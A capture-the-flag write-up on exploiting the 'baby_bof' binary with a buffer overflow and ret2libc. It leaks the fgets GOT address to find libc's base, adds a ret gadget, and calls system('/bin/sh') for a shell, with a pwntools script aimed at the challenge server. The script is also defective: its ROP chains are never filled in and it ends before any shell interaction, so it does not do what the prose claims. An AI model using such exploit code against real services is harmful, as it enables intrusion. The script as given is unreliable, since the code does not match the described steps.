Tags: pwntools python3 pwn rop
We got a simple binary with output ```plz don't rop me``` and after our input ```plz don't rop me```
Also we got a Dockerfile, which showed us the used image was Ubuntu:20.04
Based on the output, we know it was a rop challenge.
Also ```checksec baby_bof``` gave us.
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Loading the binary into *ghidra* I can calculate the offset of the return address.
So I knew, that after writing 18 characters I could overwrite the return address and control the code flow.
First I tried if I could do a rop only with the binary, but neither Ropper nor RopGadget found enough gadgets.
So I had to use libc. For this I first needed to get the address where libc was loaded.
In order for this I leaked the address of _got.fgets_.
If I then substract the address of fgets in libc, I could get the base address of libc.
After the leak I would rerun the vulnerable function to make our next input.
Then I could use _system_ and ```/bin/sh``` from libc to get a shell.
But somehow this did work on my local machine and not remote. Because I didn't see my error, I gave up and continued with other challenges.
Short before the end, I wanted to finish this challenge, so I gave it another try.
I thought, that maybe my local system had a different libc.
So I downloaded the [root](https://github.com/tianon/docker-brew-ubuntu-core/blob/4b7cb6f04bc4054f9ab1fa42b549caa1a41b7c92/focal/ubuntu-focal-core-cloudimg-amd64-root.tar.gz) from Github.
From their I could extract the libc and loading them side by side showed me the offsets were wrong.
But even with this change it didn't work.
Because I thought it could still be some error with the offset, I tried to print ```/bin/sh``` with puts.
The printout was correctly and I successfully had a shell.
From their I could cat the flag and the challenge was solved.
I didn't understanding why it worked. Testing some bits showed, that their was some call needed before the system or it woudln't work.
I modified my script, to just include a ```ret-Gadget``` and my final exploit code was.
#!/usr/bin/env python3
from pwn import *
context.arch = 'amd64'
context.kernel = 'amd64'
#context.log_level = "DEBUG"
context.log_level = "INFO"
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
vulnerable = './baby_bof'
elf = ELF(vulnerable)
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
libc2 = ELF('./libc.so.6')
#p = elf.process()#
p = remote("dctf-chall-baby-bof.westeurope.azurecontainer.io", 7481)
p.readuntil('plz don\'t rop me')
fgets_got = elf.symbols['got.fgets']
fgets_libc = libc2.symbols['fgets']
system_libc = libc2.symbols['system']
sh_libc= next(libc2.search(b'/bin/sh'))
ret = next(elf.search(asm('ret')))
rop = ROP(elf)
p.sendline(b'\x41'*18 + bytes(rop))
p.recvuntil("i don't think this will work\n")
fgets_address = p.recvuntil("\n")[:-1]
fgets_address = u64(fgets_address + b'\x00'*(8-len(fgets_address)))
libc_address = (fgets_address - fgets_libc)
system_address = system_libc + libc_address
sh_address = sh_libc + libc_address
elf.symbols['system'] = system_address
p.readuntil('plz don\'t rop me')
rop = ROP(elf)
p.sendline(b'\x41'*18 + p64(ret) + bytes(rop))
p.recvuntil("i don't think this will work\n")
The flag was located in a file called flag.txt.